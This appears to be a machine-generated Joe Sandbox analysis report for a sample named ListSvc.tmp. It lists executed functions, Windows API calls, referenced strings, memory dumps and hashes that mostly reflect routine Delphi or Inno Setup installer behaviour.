				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}

0x00420bde
0x00420be3
0x00420be7
0x00420bef
0x00420bf4
0x00420bf4
0x00420c00
0x00420c07
0x00000000
0x00420c07
0x00420c0d

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

Strings

kernel32.dll, xrefs: 00420BD9
GetDiskFreeSpaceExW, xrefs: 00420BE9

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1646373207-1127948838
Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ListSvc.tmp PID: 6296 Parent PID: 6252 ListSvc.tmpCOMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	54

Executed Functions

Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5

Strings

advapi32.dll, xrefs: 005C7D54
CheckTokenMembership, xrefs: 005C7D4F

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2691416632-1888249752
Opcode ID: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
Opcode Fuzzy Hash: 7eaf172969854dfabfe2384070bf8caee8e22896a72bba252f0bea0079ae3f0e
Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B

Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
Opcode Fuzzy Hash: 2c28104d048e73625ee3d3eed8fae21a8e15aade9eb95d70cdbdcf15955165a1
Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6

Strings

Software\Embarcadero\Locales, xrefs: 0040E33C, 0040E35E
Software\Borland\Delphi\Locales, xrefs: 0040E3D6
Software\CodeGear\Locales, xrefs: 0040E37C, 0040E39A
Software\Borland\Locales, xrefs: 0040E3B8

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD

Strings

CommonFilesDir, xrefs: 006AC35C, 006AC3D8
Common Files, xrefs: 006AC393
\Program Files, xrefs: 006AC349
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
SystemDrive, xrefs: 006AC2C1
cmd.exe, xrefs: 006AC53B
COMMAND.COM, xrefs: 006AC55C
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
ProgramFilesDir, xrefs: 006AC322, 006AC3A9

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC

Strings

p\l, xrefs: 00410C6E
P\l, xrefs: 00410C09

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: ExceptionRaise
String ID: P\l$p\l
API String ID: 3997070919-2963016475
Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54

Uniqueness

Uniqueness Score: -1.00%

Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960

Strings

Created temporary directory: , xrefs: 006AC909
\_setup64.tmp, xrefs: 006AC9DA
_isetup, xrefs: 006AC942
bm, xrefs: 006AC91B

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
API String ID: 1375471231-4222912607
Opcode ID: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
Opcode Fuzzy Hash: e237758f4fd82c383e0ca560b4e3332f66906f72f2642b2f4657cc3014f73248
Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64

Uniqueness

Uniqueness Score: -1.00%

Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4

GetWindowLongW.USER32(?,000000EC), ref: 006C4683
SetWindowLongW.USER32 ref: 006C469F
SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4

Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A

Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765

Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281

ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B

Strings

Setup, xrefs: 006C4711
Loj, xrefs: 006C4737

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
String ID: Loj$Setup
API String ID: 1533765661-1180797960
Opcode ID: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
Opcode Fuzzy Hash: 17f777bc5e0ddd78fa34bb04f44403f63e29e5f52b8ab729edceb4b8c292e480
Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00409EF8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00409F28
FreeLibrary.KERNEL32(00400000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 00409FD0
ExitProcess.KERNEL32(00000000,?,?,?,0040A032,0040701B,00407062,?,?,0040707B,?,?,?,?,004B58EA,00000000), ref: 0040A009

Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
Part of subcall function 00409E60: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
Part of subcall function 00409E60: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0

Strings

MZP, xrefs: 00409FCF

Memory Dump Source

Source File: 00000001.00000002.355302296.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.355297255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355874254.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355894496.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355902129.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355915547.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355926830.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355933690.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355939692.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355946777.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355955039.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.355961630.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.355966618.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.355972520.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ListSvc.jbxd

Similarity

API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
String ID: MZP
API String ID: 3490077880-2889622443
